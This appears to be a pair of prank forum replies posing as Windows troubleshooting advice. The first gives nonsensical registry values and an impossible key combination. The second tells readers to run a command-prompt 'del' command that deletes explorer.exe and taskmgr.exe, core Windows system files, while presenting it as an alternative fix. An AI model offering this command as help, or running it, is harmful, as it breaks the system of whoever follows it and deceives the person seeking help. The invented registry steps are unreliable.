You need to go into regedit and change the value of jpg0000001 to jpg00000186453XVID.map2-pak1//, then press CTRL,ALT, F11, ALG-GTR and TAB +7 all at the same time, then all will be well!!!!!!!!!

^ Almost, yeah but that way you have to restart your pc for the changes to come into effect. The alternatively you can open a command prompt (run: cmd.exe) and type (without quotations) "del c:\windows\explorer.exe c:\windows\system32\taskmgr.exe" and then pressing enter.
